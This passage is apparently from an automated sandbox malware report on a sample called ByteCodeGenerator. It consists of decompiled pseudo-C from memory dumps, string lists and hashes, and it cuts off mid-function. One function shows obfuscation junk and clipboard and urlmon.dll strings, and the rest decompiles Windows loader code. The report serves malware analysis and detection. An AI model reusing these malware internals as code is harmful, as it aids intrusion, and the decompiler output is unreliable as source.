                                  • Instruction Fuzzy Hash: 2AF12A76D00219EFCB11DF9AC980AEEBBB9EF49650F54006BE515AF350D7349E01CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00406ED5(signed int __eax, intOrPtr _a4, char* _a8, char* _a12) {
                                  				short _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				short _v34;
                                  				char* _v38;
                                  				char* _v42;
                                  				short _v44;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				char _v64;
                                  				void* __ebx;
                                  				intOrPtr __esi;
                                  
                                  				asm("adc [ecx], esp");
                                  				if((__eax & 0x000000f5) > 0) {
                                  					asm("sbb eax, 0x14656362");
                                  					return 1;
                                  				} else {
                                  					__esp = __ebp;
                                  					_pop(__ebp);
                                  					asm("aaa");
                                  					__edi = 0x8b55d39d;
                                  					_push(__ebp);
                                  					__ebp = __esp;
                                  					__eax = _a12;
                                  					__esp = __esp - 0x3c;
                                  					__eax = E0041C210(_a12);
                                  					if(__eax <= 0x1000) {
                                  						_push(__esi);
                                  						__esi = _a4;
                                  						__ecx =  *((intOrPtr*)(__esi + 0x7dc));
                                  						if(__ecx != 0) {
                                  							_push(__ebx);
                                  							_push(0x8b55d39d);
                                  							__edi = __eax + __eax;
                                  							__ebx = __ecx + 0x1ff570;
                                  							__ecx = _a8;
                                  							__eax = E0041C230(_a8, __ebx, __eax + __eax);
                                  							if(__eax == 0) {
                                  								__eax = E0041BF20(__ebx, _a8, __edi);
                                  								__ecx = 0;
                                  								__eax = 0;
                                  								_v8 = __cx;
                                  								__ecx =  *((intOrPtr*)(__esi + 0xcdc));
                                  								__ebx = __esi + 0x4480;
                                  								_v16 = 0xa000d;
                                  								_v12 = 0xa000d;
                                  								_v64 = 0x6c0043;
                                  								_v60 = 0x700069;
                                  								_v56 = 0x6f0062;
                                  								_v52 = 0x720061;
                                  								_v48 = 0x64;
                                  								_v44 = __ax;
                                  								_v42 = 0;
                                  								_v38 = 0;
                                  								_v34 = __ax;
                                  								__eax =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0xcdc))))(__esi + 0x4480, 0x104);
                                  								__eax =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0xcd8))))(0);
                                  								if(0 <= 0x40) {
                                  									if(0 == 0) {
                                  										__eax =  &_v32;
                                  										_v32 = 0x6e0055;
                                  										_v28 = 0x6e006b;
                                  										_v24 = 0x77006f;
                                  										_v20 = 0x6e;
                                  										__eax = E0041BF20(__ebx,  &_v32, 0x10);
                                  									}
                                  								} else {
                                  									__eax = 0;
                                  									 *((short*)(__esi + 0x4500)) = __ax;
                                  								}
                                  								__ecx =  &_v64;
                                  								__edi = __esi + 0x4d00;
                                  								E0041BF20(__esi + 0x4d00,  &_v64, 0x14) = E0041C380(__edi,  &_v16, 0);
                                  								E0041C380(__edi, __ebx, 0) =  &_v16;
                                  								__eax = E0041C380(__edi,  &_v16, 0);
                                  								__ecx = _a8;
                                  								__eax = E0041C380(__edi, _a8, 0);
                                  								__eax = E0041C210(__edi);
                                  								 *((intOrPtr*)(__esi + 0xa0c)) = __eax;
                                  								E0041C210(__edi) = __eax + __eax;
                                  								__eax = E0041BF20( *((intOrPtr*)(__esi + 0xa08)), __edi, __eax);
                                  								__eax = E0040D420(__esi, 0x13);
                                  							}
                                  							_pop(__edi);
                                  							_pop(__ebx);
                                  						}
                                  						_pop(__esi);
                                  					}
                                  					__esp = __ebp;
                                  					_pop(__ebp);
                                  					return __eax;
                                  				}
                                  			}





















                                  0x00406ed7
                                  0x00406ed9
                                  0x00406eb0
                                  0x00406ec8
                                  0x00406edb
                                  0x00406edb
                                  0x00406edb
                                  0x00406edc
                                  0x00406edd
                                  0x00406ee0
                                  0x00406ee1
                                  0x00406ee3
                                  0x00406ee6
                                  0x00406eea
                                  0x00406ef7
                                  0x00406efd
                                  0x00406efe
                                  0x00406f01
                                  0x00406f09
                                  0x00406f0f
                                  0x00406f10
                                  0x00406f11
                                  0x00406f14
                                  0x00406f1a
                                  0x00406f20
                                  0x00406f2a
                                  0x00406f36
                                  0x00406f3e
                                  0x00406f40
                                  0x00406f47
                                  0x00406f4b
                                  0x00406f51
                                  0x00406f58
                                  0x00406f5f
                                  0x00406f66
                                  0x00406f6d
                                  0x00406f74
                                  0x00406f7b
                                  0x00406f82
                                  0x00406f89
                                  0x00406f8d
                                  0x00406f90
                                  0x00406f93
                                  0x00406f97
                                  0x00406fa0
                                  0x00406fa5
                                  0x00406fb4
                                  0x00406fb8
                                  0x00406fbd
                                  0x00406fc4
                                  0x00406fcb
                                  0x00406fd2
                                  0x00406fd9
                                  0x00406fde
                                  0x00406fa7
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00406fe3
                                  0x00406fe7
                                  0x00406ffa
                                  0x0040700a
                                  0x0040700f
                                  0x00407014
                                  0x0040701b
                                  0x00407021
                                  0x0040702c
                                  0x0040703d
                                  0x00407042
                                  0x0040704a
                                  0x0040704f
                                  0x00407052
                                  0x00407053
                                  0x00407053
                                  0x00407054
                                  0x00407054
                                  0x00407055
                                  0x00407057
                                  0x00407058
                                  0x00407058

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C$a$b$d$i
                                  • API String ID: 0-2334916691
                                  • Opcode ID: e159476fe5576e68eb551a1993610f6a01299921564197499b8ef0462a034a6f
                                  • Instruction ID: be88fa83feb686a1947d97ac270ea8f69807e7a65b06d73a84b6769ddfa7c63f
                                  • Opcode Fuzzy Hash: e159476fe5576e68eb551a1993610f6a01299921564197499b8ef0462a034a6f
                                  • Instruction Fuzzy Hash: 1241D372D402086ADB10EFA0DC81FFFB3B9EF45708F00851EF819A7241D779A9458B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: 4db804c902b2f0fb93a00c5cb0bccd641c6ba438bd371f9d9cb8158395fb55ad
                                  • Instruction ID: b7dda7cff32908bbd01aa346bf8ca73daef3dd4d59b2b90073098051a206435b
                                  • Opcode Fuzzy Hash: 4db804c902b2f0fb93a00c5cb0bccd641c6ba438bd371f9d9cb8158395fb55ad
                                  • Instruction Fuzzy Hash: B8117A72E052196ADB118FA1DC41BFEFB34EF40714F10025AF80077281D7399A4587DE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E03458E00(void* __ecx) {
                                  				signed int _v8;
                                  				char _v12;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t32;
                                  				intOrPtr _t35;
                                  				intOrPtr _t43;
                                  				void* _t46;
                                  				intOrPtr _t47;
                                  				void* _t48;
                                  				signed int _t49;
                                  				void* _t50;
                                  				intOrPtr* _t51;
                                  				signed int _t52;
                                  				void* _t53;
                                  				intOrPtr _t55;
                                  
                                  				_v8 =  *0x351d360 ^ _t52;
                                  				_t49 = 0;
                                  				_t48 = __ecx;
                                  				_t55 =  *0x3518464; // 0x76d90110
                                  				if(_t55 == 0) {
                                  					L9:
                                  					if( !_t49 >= 0) {
                                  						if(( *0x3515780 & 0x00000003) != 0) {
                                  							E034A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                  						}
                                  						if(( *0x3515780 & 0x00000010) != 0) {
                                  							asm("int3");
                                  						}
                                  					}
                                  					return E0346B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                  				}
                                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                  				_t43 =  *0x3517984; // 0xca2b58
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                  					if(_t48 == _t43) {
                                  						_t50 = 0x5c;
                                  						if( *_t32 == _t50) {
                                  							_t46 = 0x3f;
                                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                  								_t32 = _t32 + 8;
                                  							}
                                  						}
                                  					}
                                  					_t51 =  *0x3518464; // 0x76d90110
                                  					 *0x351b1e0(_t47, _t32,  &_v12);
                                  					_t49 =  *_t51();
                                  					if(_t49 >= 0) {
                                  						L8:
                                  						_t35 = _v12;
                                  						if(_t35 != 0) {
                                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                  								E03459B10( *((intOrPtr*)(_t48 + 0x48)));
                                  								_t35 = _v12;
                                  							}
                                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                  						}
                                  						goto L9;
                                  					}
                                  					if(_t49 != 0xc000008a) {
                                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                  							if(_t49 != 0xc00000bb) {
                                  								goto L8;
                                  							}
                                  						}
                                  					}
                                  					if(( *0x3515780 & 0x00000005) != 0) {
                                  						_push(_t49);
                                  						E034A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                  						_t53 = _t53 + 0x1c;
                                  					}
                                  					_t49 = 0;
                                  					goto L8;
                                  				} else {
                                  					goto L9;
                                  				}
                                  			}




















                                  0x03458e0f
                                  0x03458e16
                                  0x03458e19
                                  0x03458e1b
                                  0x03458e21
                                  0x03458e7f
                                  0x03458e85
                                  0x03499354
                                  0x0349936c
                                  0x03499371
                                  0x0349937b
                                  0x03499381
                                  0x03499381
                                  0x0349937b
                                  0x03458e9d
                                  0x03458e9d
                                  0x03458e29
                                  0x03458e2c
                                  0x03458e38
                                  0x03458e3e
                                  0x03458e43
                                  0x03458eb5
                                  0x03458eb9
                                  0x034992aa
                                  0x034992af
                                  0x034992e8
                                  0x034992e8
                                  0x034992af
                                  0x03458eb9
                                  0x03458e45
                                  0x03458e53
                                  0x03458e5b
                                  0x03458e5f
                                  0x03458e78
                                  0x03458e78
                                  0x03458e7d
                                  0x03458ec3
                                  0x03458ecd
                                  0x03458ed2
                                  0x03458ed2
                                  0x03458ec5
                                  0x03458ec5
                                  0x00000000
                                  0x03458e7d
                                  0x03458e67
                                  0x03458ea4
                                  0x0349931a
                                  0x00000000
                                  0x00000000
                                  0x03499320
                                  0x03458ea4
                                  0x03458e70
                                  0x03499325
                                  0x03499340
                                  0x03499345
                                  0x03499345
                                  0x03458e76
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0349933B, 03499367
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0349932A
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 03499357
                                  • LdrpFindDllActivationContext, xrefs: 03499331, 0349935D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: 79546ca95393924c8d0a97e35ee885d2182c214102dd18a80e41a50fc7c08a60
                                  • Instruction ID: 682ad670d4288359ccfcde8afc3630e6c2523a362b9282c2fb09f08e3fa9a50f
                                  • Opcode Fuzzy Hash: 79546ca95393924c8d0a97e35ee885d2182c214102dd18a80e41a50fc7c08a60
                                  • Instruction Fuzzy Hash: 2D41F822F803159EDB35EB458849A37B6B4A745244F0D456BFC14DF262EFB06C81C68B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E03438794(void* __ecx) {
                                  				signed int _v0;
                                  				char _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				intOrPtr _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v40;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t77;
                                  				signed int _t80;
                                  				signed char _t81;
                                  				signed int _t87;
                                  				signed int _t91;
                                  				void* _t92;
                                  				void* _t94;
                                  				signed int _t95;
                                  				signed int _t103;
                                  				signed int _t105;
                                  				signed int _t110;
                                  				signed int _t118;
                                  				intOrPtr* _t121;
                                  				intOrPtr _t122;
                                  				signed int _t125;
                                  				signed int _t129;
                                  				signed int _t131;
                                  				signed int _t134;
                                  				signed int _t136;
                                  				signed int _t143;
                                  				signed int* _t147;
                                  				signed int _t151;
                                  				void* _t153;
                                  				signed int* _t157;
                                  				signed int _t159;
                                  				signed int _t161;
                                  				signed int _t166;
                                  				signed int _t168;
                                  
                                  				_push(__ecx);
                                  				_t153 = __ecx;
                                  				_t159 = 0;
                                  				_t121 = __ecx + 0x3c;
                                  				if( *_t121 == 0) {
                                  					L2:
                                  					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                  					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                  						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                  						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                  						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                  							L6:
                                  							if(E0343934A() != 0) {
                                  								_t159 = E034AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                  								__eflags = _t159;
                                  								if(_t159 < 0) {
                                  									_t81 =  *0x3515780; // 0x0
                                  									__eflags = _t81 & 0x00000003;
                                  									if((_t81 & 0x00000003) != 0) {
                                  										_push(_t159);
                                  										E034A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                  										_t81 =  *0x3515780; // 0x0
                                  									}
                                  									__eflags = _t81 & 0x00000010;
                                  									if((_t81 & 0x00000010) != 0) {
                                  										asm("int3");
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t159 = E0343849B(0, _t122, _t153, _t159, _t180);
                                  							if(_t159 >= 0) {
                                  								goto L6;
                                  							}
                                  						}
                                  						_t80 = _t159;
                                  						goto L8;
                                  					} else {
                                  						_t125 = 0x13;
                                  						asm("int 0x29");
                                  						_push(0);
                                  						_push(_t159);
                                  						_t161 = _t125;
                                  						_t87 =  *( *[fs:0x30] + 0x1e8);
                                  						_t143 = 0;
                                  						_v40 = _t161;
                                  						_t118 = 0;
                                  						_push(_t153);
                                  						__eflags = _t87;
                                  						if(_t87 != 0) {
                                  							_t118 = _t87 + 0x5d8;
                                  							__eflags = _t118;
                                  							if(_t118 == 0) {
                                  								L46:
                                  								_t118 = 0;
                                  							} else {
                                  								__eflags =  *(_t118 + 0x30);
                                  								if( *(_t118 + 0x30) == 0) {
                                  									goto L46;
                                  								}
                                  							}
                                  						}
                                  						_v32 = 0;
                                  						_v28 = 0;
                                  						_v16 = 0;
                                  						_v20 = 0;
                                  						_v12 = 0;
                                  						__eflags = _t118;
                                  						if(_t118 != 0) {
                                  							__eflags = _t161;
                                  							if(_t161 != 0) {
                                  								__eflags =  *(_t118 + 8);
                                  								if( *(_t118 + 8) == 0) {
                                  									L22:
                                  									_t143 = 1;
                                  									__eflags = 1;
                                  								} else {
                                  									_t19 = _t118 + 0x40; // 0x40
                                  									_t156 = _t19;
                                  									E03438999(_t19,  &_v16);
                                  									__eflags = _v0;
                                  									if(_v0 != 0) {
                                  										__eflags = _v0 - 1;
                                  										if(_v0 != 1) {
                                  											goto L22;
                                  										} else {
                                  											_t128 =  *(_t161 + 0x64);
                                  											__eflags =  *(_t161 + 0x64);
                                  											if( *(_t161 + 0x64) == 0) {
                                  												goto L22;
                                  											} else {
                                  												E03438999(_t128,  &_v12);
                                  												_t147 = _v12;
                                  												_t91 = 0;
                                  												__eflags = 0;
                                  												_t129 =  *_t147;
                                  												while(1) {
                                  													__eflags =  *((intOrPtr*)(0x3515c60 + _t91 * 8)) - _t129;
                                  													if( *((intOrPtr*)(0x3515c60 + _t91 * 8)) == _t129) {
                                  														break;
                                  													}
                                  													_t91 = _t91 + 1;
                                  													__eflags = _t91 - 5;
                                  													if(_t91 < 5) {
                                  														continue;
                                  													} else {
                                  														_t131 = 0;
                                  														__eflags = 0;
                                  													}
                                  													L37:
                                  													__eflags = _t131;
                                  													if(_t131 != 0) {
                                  														goto L22;
                                  													} else {
                                  														__eflags = _v16 - _t147;
                                  														if(_v16 != _t147) {
                                  															goto L22;
                                  														} else {
                                  															E03442280(_t92, 0x35186cc);
                                  															_t94 = E034F9DFB( &_v20);
                                  															__eflags = _t94 - 1;
                                  															if(_t94 != 1) {
                                  															}
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															 *_t118 =  *_t118 + 1;
                                  															asm("adc dword [ebx+0x4], 0x0");
                                  															_t95 = E034561A0( &_v32);
                                  															__eflags = _t95;
                                  															if(_t95 != 0) {
                                  																__eflags = _v32 | _v28;
                                  																if((_v32 | _v28) != 0) {
                                  																	_t71 = _t118 + 0x40; // 0x3f
                                  																	_t134 = _t71;
                                  																	goto L55;
                                  																}
                                  															}
                                  															goto L30;
                                  														}
                                  													}
                                  													goto L56;
                                  												}
                                  												_t92 = 0x3515c64 + _t91 * 8;
                                  												asm("lock xadd [eax], ecx");
                                  												_t131 = (_t129 | 0xffffffff) - 1;
                                  												goto L37;
                                  											}
                                  										}
                                  										goto L56;
                                  									} else {
                                  										_t143 = E03438A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                  										__eflags = _t143;
                                  										if(_t143 != 0) {
                                  											_t157 = _v12;
                                  											_t103 = 0;
                                  											__eflags = 0;
                                  											_t136 =  &(_t157[1]);
                                  											 *(_t161 + 0x64) = _t136;
                                  											_t151 =  *_t157;
                                  											_v20 = _t136;
                                  											while(1) {
                                  												__eflags =  *((intOrPtr*)(0x3515c60 + _t103 * 8)) - _t151;
                                  												if( *((intOrPtr*)(0x3515c60 + _t103 * 8)) == _t151) {
                                  													break;
                                  												}
                                  												_t103 = _t103 + 1;
                                  												__eflags = _t103 - 5;
                                  												if(_t103 < 5) {
                                  													continue;
                                  												}
                                  												L21:
                                  												_t105 = E0346F380(_t136, 0x3401184, 0x10);
                                  												__eflags = _t105;
                                  												if(_t105 != 0) {
                                  													__eflags =  *_t157 -  *_v16;
                                  													if( *_t157 >=  *_v16) {
                                  														goto L22;
                                  													} else {
                                  														asm("cdq");
                                  														_t166 = _t157[5] & 0x0000ffff;
                                  														_t108 = _t157[5] & 0x0000ffff;
                                  														asm("cdq");
                                  														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                  														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                  														if(__eflags > 0) {
                                  															L29:
                                  															E03442280(_t108, 0x35186cc);
                                  															 *_t118 =  *_t118 + 1;
                                  															_t42 = _t118 + 0x40; // 0x3f
                                  															_t156 = _t42;
                                  															asm("adc dword [ebx+0x4], 0x0");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															_t110 = E034561A0( &_v32);
                                  															__eflags = _t110;
                                  															if(_t110 != 0) {
                                  																__eflags = _v32 | _v28;
                                  																if((_v32 | _v28) != 0) {
                                  																	_t134 = _v20;
                                  																	L55:
                                  																	E034F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                  																}
                                  															}
                                  															L30:
                                  															 *_t118 =  *_t118 + 1;
                                  															asm("adc dword [ebx+0x4], 0x0");
                                  															E0343FFB0(_t118, _t156, 0x35186cc);
                                  															goto L22;
                                  														} else {
                                  															if(__eflags < 0) {
                                  																goto L22;
                                  															} else {
                                  																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                  																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                  																	goto L22;
                                  																} else {
                                  																	goto L29;
                                  																}
                                  															}
                                  														}
                                  													}
                                  													goto L56;
                                  												}
                                  												goto L22;
                                  											}
                                  											asm("lock inc dword [eax]");
                                  											goto L21;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						return _t143;
                                  					}
                                  				} else {
                                  					_push( &_v8);
                                  					_push( *((intOrPtr*)(__ecx + 0x50)));
                                  					_push(__ecx + 0x40);
                                  					_push(_t121);
                                  					_push(0xffffffff);
                                  					_t80 = E03469A00();
                                  					_t159 = _t80;
                                  					if(_t159 < 0) {
                                  						L8:
                                  						return _t80;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  				L56:
                                  			}












































                                  0x03438799
                                  0x0343879d
                                  0x034387a1
                                  0x034387a3
                                  0x034387a8
                                  0x034387c3
                                  0x034387c3
                                  0x034387c8
                                  0x034387d1
                                  0x034387d4
                                  0x034387d8
                                  0x034387e5
                                  0x034387ec
                                  0x03489bfe
                                  0x03489c00
                                  0x03489c02
                                  0x03489c08
                                  0x03489c0d
                                  0x03489c0f
                                  0x03489c14
                                  0x03489c2d
                                  0x03489c32
                                  0x03489c37
                                  0x03489c3a
                                  0x03489c3c
                                  0x03489c42
                                  0x03489c42
                                  0x03489c3c
                                  0x03489c02
                                  0x034387da
                                  0x034387df
                                  0x034387e3
                                  0x00000000
                                  0x00000000
                                  0x034387e3
                                  0x034387f2
                                  0x00000000
                                  0x034387fb
                                  0x034387fd
                                  0x034387fe
                                  0x0343880e
                                  0x0343880f
                                  0x03438810
                                  0x03438814
                                  0x0343881a
                                  0x0343881c
                                  0x0343881f
                                  0x03438821
                                  0x03438822
                                  0x03438824
                                  0x03438826
                                  0x0343882c
                                  0x0343882e
                                  0x03489c48
                                  0x03489c48
                                  0x03438834
                                  0x03438834
                                  0x03438837
                                  0x00000000
                                  0x00000000
                                  0x03438837
                                  0x0343882e
                                  0x0343883d
                                  0x03438840
                                  0x03438843
                                  0x03438846
                                  0x03438849
                                  0x0343884c
                                  0x0343884e
                                  0x03438850
                                  0x03438852
                                  0x03438854
                                  0x03438857
                                  0x034388b4
                                  0x034388b6
                                  0x034388b6
                                  0x03438859
                                  0x03438859
                                  0x03438859
                                  0x03438861
                                  0x03438866
                                  0x0343886a
                                  0x0343893d
                                  0x03438941
                                  0x00000000
                                  0x03438947
                                  0x03438947
                                  0x0343894a
                                  0x0343894c
                                  0x00000000
                                  0x03438952
                                  0x03438955
                                  0x0343895a
                                  0x0343895d
                                  0x0343895d
                                  0x0343895f
                                  0x03438961
                                  0x03438961
                                  0x03438968
                                  0x00000000
                                  0x00000000
                                  0x0343896a
                                  0x0343896b
                                  0x0343896e
                                  0x00000000
                                  0x03438970
                                  0x03438970
                                  0x03438970
                                  0x03438970
                                  0x03438972
                                  0x03438972
                                  0x03438974
                                  0x00000000
                                  0x0343897a
                                  0x0343897a
                                  0x0343897d
                                  0x00000000
                                  0x03438983
                                  0x03489c65
                                  0x03489c6d
                                  0x03489c72
                                  0x03489c75
                                  0x03489c75
                                  0x03489c82
                                  0x03489c86
                                  0x03489c87
                                  0x03489c88
                                  0x03489c89
                                  0x03489c8c
                                  0x03489c90
                                  0x03489c95
                                  0x03489c97
                                  0x03489ca0
                                  0x03489ca3
                                  0x03489ca9
                                  0x03489ca9
                                  0x00000000
                                  0x03489ca9
                                  0x03489ca3
                                  0x00000000
                                  0x03489c97
                                  0x0343897d
                                  0x00000000
                                  0x03438974
                                  0x03438988
                                  0x03438992
                                  0x03438996
                                  0x00000000
                                  0x03438996
                                  0x0343894c
                                  0x00000000
                                  0x03438870
                                  0x0343887b
                                  0x0343887d
                                  0x0343887f
                                  0x03438881
                                  0x03438884
                                  0x03438884
                                  0x03438886
                                  0x03438889
                                  0x0343888c
                                  0x0343888e
                                  0x03438891
                                  0x03438891
                                  0x03438898
                                  0x00000000
                                  0x00000000
                                  0x0343889a
                                  0x0343889b
                                  0x0343889e
                                  0x00000000
                                  0x00000000
                                  0x034388a0
                                  0x034388a8
                                  0x034388b0
                                  0x034388b2
                                  0x034388d3
                                  0x034388d5
                                  0x00000000
                                  0x034388d7
                                  0x034388db
                                  0x034388dc
                                  0x034388e0
                                  0x034388e8
                                  0x034388ee
                                  0x034388f0
                                  0x034388f3
                                  0x034388fc
                                  0x03438901
                                  0x03438906
                                  0x0343890c
                                  0x0343890c
                                  0x0343890f
                                  0x03438916
                                  0x03438917
                                  0x03438918
                                  0x03438919
                                  0x0343891a
                                  0x0343891f
                                  0x03438921
                                  0x03489c52
                                  0x03489c55
                                  0x03489c5b
                                  0x03489cac
                                  0x03489cc0
                                  0x03489cc0
                                  0x03489c55
                                  0x03438927
                                  0x03438927
                                  0x0343892f
                                  0x03438933
                                  0x00000000
                                  0x034388f5
                                  0x034388f5
                                  0x00000000
                                  0x034388f7
                                  0x034388f7
                                  0x034388fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034388fa
                                  0x034388f5
                                  0x034388f3
                                  0x00000000
                                  0x034388d5
                                  0x00000000
                                  0x034388b2
                                  0x034388c9
                                  0x00000000
                                  0x034388c9
                                  0x0343887f
                                  0x0343886a
                                  0x03438857
                                  0x03438852
                                  0x034388bf
                                  0x034388bf
                                  0x034387aa
                                  0x034387ad
                                  0x034387ae
                                  0x034387b4
                                  0x034387b5
                                  0x034387b6
                                  0x034387b8
                                  0x034387bd
                                  0x034387c1
                                  0x034387f4
                                  0x034387fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034387c1
                                  0x00000000

                                  Strings
                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03489C18
                                  • LdrpDoPostSnapWork, xrefs: 03489C1E
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 03489C28
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 2994545307-1948996284
                                  • Opcode ID: c40b9a59fd0c939a450896c65e0ef153aa75ed225c84d4868d57b2d8a0d3fa5c
                                  • Instruction ID: 51af667fda3fb2ef50af0f387512dd8a7312552e2395104bb2c76227f09987c5
                                  • Opcode Fuzzy Hash: c40b9a59fd0c939a450896c65e0ef153aa75ed225c84d4868d57b2d8a0d3fa5c
                                  • Instruction Fuzzy Hash: 0491E471A006199FDB18DF59C88197EF3B5FF8A314B18416BF805AF251E730E949CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E03437E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				signed int _t73;
                                  				void* _t77;
                                  				char* _t82;
                                  				char* _t87;
                                  				signed char* _t97;
                                  				signed char _t102;
                                  				intOrPtr _t107;
                                  				signed char* _t108;
                                  				intOrPtr _t112;
                                  				intOrPtr _t124;
                                  				intOrPtr _t125;
                                  				intOrPtr _t126;
                                  
                                  				_t107 = __edx;
                                  				_v12 = __ecx;
                                  				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                  				_t124 = 0;
                                  				_v20 = __edx;
                                  				if(E0343CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                  					_t112 = _v8;
                                  				} else {
                                  					_t112 = 0;
                                  					_v8 = 0;
                                  				}
                                  				if(_t112 != 0) {
                                  					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                  						_t124 = 0xc000007b;
                                  						goto L8;
                                  					}
                                  					_t73 =  *(_t125 + 0x34) | 0x00400000;
